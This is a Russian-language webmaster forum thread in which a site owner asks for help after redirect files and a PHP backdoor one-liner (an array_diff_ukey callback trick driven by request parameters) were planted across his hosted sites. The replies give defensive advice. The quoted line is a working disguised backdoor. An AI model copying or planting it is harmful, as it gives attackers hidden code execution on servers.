??? Даже не знаю как назвать тему

12
T
На сайте с 02.02.2015
Offline
35
1949

В общем засрали половину сайтов на хостинге файлами с редиректом для андроидов.

Сперва грешил на шаб вордпреса но потом заметил что файлы лежат даже в папках со статическими сайтами где нет ни админки ни каких либо скриптов где можно дыру найти просто пачка HTML страниц.

И все эти левые файлы одинаковые кроме одного через который как я понимаю и проникают содержимое файла

<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>

но вот как он туда попадает я не догоняю.

Помогите решить проблему, в безопастности совсем не силен. И по возможности объясните какую функцыю фыполняет приведеный выше код. Я так понимаю это сброс пароля по логам к нему обращаются ПОСТОМ но куда он передает логин пароль не могу понять.

dkameleon
На сайте с 09.12.2005
Offline
386
#1
Tilo:
но вот как он туда попадает я не догоняю.

1. через ФТП.

2. сервак взломан.

возможно по правам файла или овнеру удастся определить точнее

Дизайн интерьера (http://balabukha.com/)
K5
На сайте с 21.07.2010
Offline
209
#2

дырку в коряво-написанном шаблоне или аккуратненько замаскированный шелл не рассматриваете? почему? чем проверяете сайты (ай-болит и манул не панацея)? кстати вордпресс то обновлен? и только он один на пхп или есть еще пара сайтов на других движках, о которых как обычно забыли упомянуть, пеняя только на вордпресс???

P.S. перехват паролей фтп и взлом самого сервера уже редкость...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
T
На сайте с 02.02.2015
Offline
35
#3

два сайта на вордпресе и один магазинчик маленький на ocshop остальные сайты статика. ВП последний стоит только недавно поставил. грешу на ocshop потому что в него проникли еще до ВП внесли редирект в htaccess всех ботов сливали и мобильный сайт три месяца не индексировался из за этого пока я в фаилик не заглянул.

---------- Добавлено 27.04.2015 в 08:37 ----------

А не подскажете есть ли способ как то изольровать папки чтобы если один сайт ломанули шел не вылазил за пределы ломаного сайта?

K5
На сайте с 21.07.2010
Offline
209
#4

сайты по отдельным аккаунтам хостинга разделяйте, по другому никак.

загруженный на один из сайтов шелл-скрипт дает полный доступ ко всем сайтам и папкам на аккаунте.

install
На сайте с 20.02.2011
Offline
143
#5

Всей сайты в одну папку не складируйте.

Есть проги, которые проверяют наличие в шаблонах левых ссылок, да и самому визуально смотреть нужно.

Покупайте шаблоны, а не скачивайте левые рипы.

Меняйте пароли, делайте почаще бэкапы.

Смотрите изменения файлов, когда были сделаны, смотрите логи на сервере, кто от куда и через что пробрался.

Лей Бурж Сюда (https://clck.ru/9of9G) VPS/VDS. Бесплатное администрирование 24/7 (http://goo.gl/kmKpNi)
T
На сайте с 02.02.2015
Offline
35
#6
install:
Всей сайты в одну папку не складируйте.
Есть проги, которые проверяют наличие в шаблонах левых ссылок, да и самому визуально смотреть нужно.
Покупайте шаблоны, а не скачивайте левые рипы.
Меняйте пароли, делайте почаще бэкапы.
Смотрите изменения файлов, когда были сделаны, смотрите логи на сервере, кто от куда и через что пробрался.

на окшопе шаб дефолтный сайты на вордпресе еще даже не трогал тупо залил сам вордпрес и всЁ пока некогда ими заниматся.

PS: А не подскажете какой софт юзать?

K5
На сайте с 21.07.2010
Offline
209
#7
install:
сайты в одну папку не складируйте.

что бы это значило?

install:
наличие в шаблонах левых ссылок

у тс'а они в отдельных файлах по всему сайту разбросаны, что даст поиск ссылок по файлам шаблона?

install:
кто от куда и через что пробрался

не каждый юзер знает, что такое логи, а вы говорите - ищи кто и как!!

Solmyr
На сайте с 10.09.2007
Offline
501
#8

Попросите хостера посмотреть логи ФТП

T
На сайте с 02.02.2015
Offline
35
#9
kgtu5:

не каждый юзер знает, что такое логи, а вы говорите - ищи кто и как!!

Я как бы зная что такое логи могу посмотреть кто куда обращялся но во первых подмену аипишника никто не отменял чтобы можно было закрыть доступ вредителю по айпи а во вторыш шел может лежать сколько угодно долго ждать когда к нему обратятся. Это я к тому что он может быть залит три месяца назад а проявил себя только вчера. так что искать как он туда попал занятие так себа, сомнительное. + неоднократно встречался с тем что дату создания файла подменяют

K5
На сайте с 21.07.2010
Offline
209
#10
Tilo:
так что искать как он туда попал занятие так себа, сомнительное

искать как раз его и надо, иначе каждый день/неделю будете последствия вычищать, что в разы не благодарнее...

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий